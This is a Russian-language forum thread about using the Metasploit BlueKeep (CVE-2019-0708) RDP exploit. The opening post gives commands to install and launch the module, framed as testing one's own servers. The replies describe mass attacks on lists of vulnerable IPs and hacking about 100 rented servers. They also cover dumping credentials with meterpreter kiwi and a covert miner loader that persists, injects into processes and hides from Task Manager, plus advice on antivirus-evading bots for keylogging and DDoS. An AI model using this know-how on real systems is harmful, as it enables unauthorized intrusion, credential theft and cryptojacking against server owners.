Soft Metasploit Эксплоит BlueKeep (CVE-2019-0708)

Вышел публичный эксплоит на уязвимость BlueKeep (CVE-2019-0708). Теперь он есть в составе Metasploit Framework, но пока еще не появился в deb пакетах.

Выпущенный эксплоит работает на следующих ОС и конфигурациях:
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Для тех, кто хочет проверить СВОИ сервера на возможность практической реализации уязвимости, данный эксплоит его можно поставить вручную, для этого нужно с гитхаба скопировать ряд файлов и установить их в Metasploit.
Ниже привожу набор команд для установки эксплоита (пути указаны для стандартной установки Metasploit в Kali Linux):
Bash:
cd ~
mkdir backup
mkdir msf
mv /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb ~/backup/msf
mv /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb ~/backup/msf

wget -O /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

wget -O /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

mkdir /usr/share/metasploit-framework/modules/exploits/windows/rdp
wget -O /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Далее стандартный запуск:
Код:
msfconsole
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhosts 127.0.0.1
run

И если потребуется вернуть все на место:

Код:
mv ~/backup/msf/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv ~/backup/msf/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv ~/backup/msf/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
rm -rf /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
rm -rf ~/backup/

Удачных тестирований на проникновение!
 
Последнее редактирование:
Возьмите любой rdp клиент и зайдите. Только перед именем надо домен указывать.
Да , но для этого сначало надо логин и пароль узнать. ((((

Из 4 хостов , ни на один не получилось запустить свой файл , и только на одном смог создать нового юзера для rdp . Хотя 4 хоста это мало для статистики.
 
Да , но для этого сначало надо логин и пароль узнать. ((((
Поэтому я вам и дал ссылку на справку по meterpreter.
А там есть такое:
load kiwi
creds_all

Второй вариант уже есть в этой теме, как создать нового пользователя.

Из 4 хостов , ни на один не получилось запустить свой файл , и только на одном смог создать нового юзера для rdp . Хотя 4 хоста это мало для статистики.
На серваках стоят антивирусы. Поэтому этот ваш майнер должен быть хорошо закриптован и неизвестен антивирусам.
 
Да , но для этого сначало надо логин и пароль узнать. ((((

Из 4 хостов , ни на один не получилось запустить свой файл , и только на одном смог создать нового юзера для rdp . Хотя 4 хоста это мало для статистики.
Я тоже ставил майнера, причем, сам написал загрузчик к нему, сперва на C#, а потом запотел даже на C, у меня было 50 машин, но я бросил. Майнер прописывался в разные виды автозагрузок, работал только в то время, когда юзер был не у компа, исчезал при включении Taskmanager и его аналогов, даже инжектился в системные процессы, код загружал с сайта сразу в память. Но тратится куча времени на установку, а затем они начинают слетать, причем, часто быстрее, чем успеваешь их ставить. А серваки эти дохлые. За месяц упорного труда я заработал... 15 евро. Поэтому мне надоело это. Лучше ставить ботов, а уже их использовать в том числе иногда и для майнинга, кейлоггинга, ДДоС, сбора паролей и т.д. Но бота надо писать самому и постоянно его криптовать, находить способы обхода антивирусов. Покупать готовые смысла нет, очень много мошенников. Как минимум, надо знать Delphi, C/C++ или C#. В худшем случае, Python. Чем нативнее будет программа, тем лучше. Чтобы запускалась на всех виндах.
Правда, есть одно НО. Я всегда использовал CPU на 100%. Возможно, какие-то мониторинговые программы это заметили.
 
Последнее редактирование:
Не подскажете как можно решить одну небольшую проблему, при атаке на список уязвимых ip бывает что на определённом адресе exploit зависает (Обычно на Sending client font list PDU). И чтобы перейти к следующему ip необходимо нажать Ctrl+C но хотелось бы полностью автоматизировать процесс. Может есть настройка которая отвечает за время которое Metasploit уделяет одному адресу из списка после чего переходит к следующему или эту проблему можно решить с помощью bash-скрипта?
 
  • Нравится
Реакции: Alois и babybone
какое самое оптимальное значение для groomsize? Как у вас так легко получается получить заветную сессию? Из 50 уязвимых дедиков нету ничего.
дедиков я взломал уже немало. Ну для начинающего. Около 100.
 
Последнее редактирование:
какое самое оптимальное значение для groomsize? Как у вас так легко получается получить заветную сессию? Из 50 уязвимых дедиков нету ничего.
250 - оптимальное значение. У меня тоже бывает из 50 ничего, а бывает из 10 два сервера.

Не подскажете как можно решить одну небольшую проблему, при атаке на список уязвимых ip бывает что на определённом адресе exploit зависает (Обычно на Sending client font list PDU). И чтобы перейти к следующему ip необходимо нажать Ctrl+C но хотелось бы полностью автоматизировать процесс. Может есть настройка которая отвечает за время которое Metasploit уделяет одному адресу из списка после чего переходит к следующему или эту проблему можно решить с помощью bash-скрипта?
К сожалению, я пока так и не смог найти способ обхода этой ошибки. Поэтому часто сам слежу за процессом и вмешиваюсь, если зависает.
 
Я тоже ставил майнера, причем, сам написал загрузчик к нему, сперва на C#, а потом запотел даже на C, у меня было 50 машин, но я бросил. Майнер прописывался в разные виды автозагрузок, работал только в то время, когда юзер был не у компа, исчезал при включении Taskmanager и его аналогов, даже инжектился в системные процессы, код загружал с сайта сразу в память. Но тратится куча времени на установку, а затем они начинают слетать, причем, часто быстрее, чем успеваешь их ставить. А серваки эти дохлые. За месяц упорного труда я заработал... 15 евро. Поэтому мне надоело это. Лучше ставить ботов, а уже их использовать в том числе иногда и для майнинга, кейлоггинга, ДДоС, сбора паролей и т.д. Но бота надо писать самому и постоянно его криптовать, находить способы обхода антивирусов. Покупать готовые смысла нет, очень много мошенников. Как минимум, надо знать Delphi, C/C++ или C#. В худшем случае, Python. Чем нативнее будет программа, тем лучше. Чтобы запускалась на всех виндах.
Правда, есть одно НО. Я всегда использовал CPU на 100%. Возможно, какие-то мониторинговые программы это заметили.
я напишу вам в лс.
 
Как у вас так легко получается получить заветную сессию? Из 50 уязвимых дедиков нету ничего.
Это зависит от разных факторов. Например, взламываете вы со своего компьютера, с тором/без тора, с удаленного сервера с белым публичным IP, и так далее.
 
Это зависит от разных факторов. Например, взламываете вы со своего компьютера, с тором/без тора, с удаленного сервера с белым публичным IP, и так далее.
Взламываю с удаленного сервера, без тора, но с публичным ip
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!